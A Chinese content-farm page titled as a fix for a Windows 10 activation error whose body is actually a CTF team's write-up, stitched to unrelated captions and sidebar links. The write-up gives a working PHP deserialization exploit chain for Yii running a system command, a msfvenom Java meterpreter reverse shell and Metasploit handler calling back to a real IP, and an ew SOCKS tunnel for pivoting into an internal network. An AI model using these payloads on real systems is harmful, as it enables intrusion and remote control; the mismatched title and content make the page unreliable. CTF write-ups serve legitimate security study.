当前位置:首页 > 数码 >

windows10提示0x8007b激活错误(win10激活0x8007b怎么解决)

来源:原点资讯(www.yd166.com)时间:2024-05-22 06:07:33作者:YD166手机阅读>>

bad_cat战队WRITEUP一、 战队信息

战队名称:bad_cat

战队排名:6

二、 解题情况三、 解题过程web1、**ezyii**

网上搜yii的1day

https://xz.aliyun.com/t/9948#toc-6

思路类似于第四条链子

exp:

<?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $processes = []; public function __construct(){ $this->processes[]=new DefaultGenerator(new AppendStream()); $this->output=new DefaultGenerator('jiang'); } } echo base64_encode(serialize(new RunProcess())); } namespace Faker{ class DefaultGenerator { protected $default; public function __construct($default = null) { $this->default = $default; } } } namespace GuzzleHttp\Psr7{ use Faker\DefaultGenerator; final class AppendStream{ private $streams = []; private $seekable = true; public function __construct(){ $this->streams[]=new CachingStream(); } } final class CachingStream{ private $remoteStream; public function __construct(){ $this->remoteStream=new DefaultGenerator(false); $this->stream=new PumpStream(); } } final class PumpStream{ private $source; private $size=-10; private $buffer; public function __construct(){ $this->buffer=new DefaultGenerator('j'); include("closure/autoload.php"); $a = function(){system('cat /flag.txt');}; $a = \Opis\Closure\serialize($a); $b = unserialize($a); $this->source=$b; } } }

然后post就行

flag{19fefeeb-989a-4017-8001-7af62b9e511b}

2、**层层穿透**

直接传jar可以反弹shell进内网入口

参考 https://blog.csdn.net/cainiao17441898/article/details/118877408

msfvenom -p java/meterpreter/reverse_tcp LHOST=82.157.25.143 LPORT=11112 -f jar > rce111.jar

use exploit/multi/handler

set PAYLOAD java/meterpreter/reverse_tcp

set lhost 82.157.25.143

set lport 11112

run -j

先监听后上传,就不会报500的错误了

此时再去submit

sessions

sessions id 执行拿到shell再 bash -i 2>&1 ,上传一个ew内网穿透(https://github.com/idlefire/ew),chmod下

msf的upload shell执行

./ew -s rssocks -d 82.157.25.143 -e 18888

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(1)

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(2)

扫描c段,看10.10.1.11:8080

post登陆

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(3)

抓个包拿session

Cookie: JSESSIONID=DF20EA8AA43E4B62E2CEED904810B112

源码解压看pom.xml依赖

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(4)

栏目热文

win10激活出现0x80072ee2错误(win10专业版激活时显示0x8007232b)

win10激活出现0x80072ee2错误(win10专业版激活时显示0x8007232b)

Windows 10更新是一个有争议的问题。有些用户喜欢自动化; 其他人厌恶霸道的做法。无论你采取什么措施,总有可能出现...

2024-05-22 06:17:44查看全文 >>

激活win10出现0x8007007d怎么办(win10激活0x8007b怎么解决)

激活win10出现0x8007007d怎么办(win10激活0x8007b怎么解决)

全球满足系统要求的PC用户现在可以下载和安装Windows 11升级版,但是有些人在安装过程中遇到了一些问题。微软已经承...

2024-05-22 06:08:36查看全文 >>

win10激活错误代码0x800705b4(win10无法激活错误代码0x800704cf)

win10激活错误代码0x800705b4(win10无法激活错误代码0x800704cf)

Win10系统进行激活时出现0x800705b4怎么办?大家都知道,再将win10系统安装完成之后,都是需要进行激活才能...

2024-05-22 05:54:26查看全文 >>

教资认证常见问题(教资认证需要重新注册吗)

教资认证常见问题(教资认证需要重新注册吗)

教资认定几种常见的问题,今天一一给大家解答一下。因为这两天都已经开始认定了,各个地市或者各个省都已经在认定的状态了,在网...

2024-05-22 06:13:10查看全文 >>

教资为什么需要认证(教资认证通过了是啥样的)

教资为什么需要认证(教资认证通过了是啥样的)

作者:小存10月29日进行了教师资格证的国考,关于教资的话题一度冲上微博热搜,占据了好几个词条,话题关注度居高不下,引发...

2024-05-22 06:15:19查看全文 >>

防弹少年团高考寄语(防弹少年团高中的考试成绩是多少)

防弹少年团高考寄语(防弹少年团高中的考试成绩是多少)

7月6日,防弹少年团在微博分享一段视频为高考生加油,发文:“加油,不平凡的2020”。视频中,防弹成员们充满诚意地用中文...

2024-05-27 09:49:23查看全文 >>

防弹少年团学习励志(防弹少年团关于考试祝福)

防弹少年团学习励志(防弹少年团关于考试祝福)

1.在韩国,‘未来’这个词由两个部分组成,第一部分的意思是‘不’,第二种意思是‘来’。从这个意义上说,“未来”指的是不会...

2024-05-27 09:57:58查看全文 >>

防弹少年团高考之路(防弹少年团在校学习成绩)

防弹少年团高考之路(防弹少年团在校学习成绩)

【instiz】防弹少年团suga的高考后记。“考完回来这天没睡着,心里弥漫着一种奇怪的情绪。有点虚无,各种各样的想法涌...

2024-05-27 09:39:33查看全文 >>

防弹少年团签名要求(防弹少年团的签名)

防弹少年团签名要求(防弹少年团的签名)

30日,MAMA公开了防弹少年团的亲笔签名照,“see you at 2017 MAMA”各具特色,队内大触担当JIMI...

2024-05-27 10:20:15查看全文 >>

歌曲背后的真实故事(歌曲一个真实的故事背景)

歌曲背后的真实故事(歌曲一个真实的故事背景)

《此生未完成的》的作者于娟曾说过:如果回到曾经,我一定会放弃一些东西,花更多的时间陪伴我的儿子和丈夫,可我现在却将离开这...

2024-05-27 09:50:49查看全文 >>

文档排行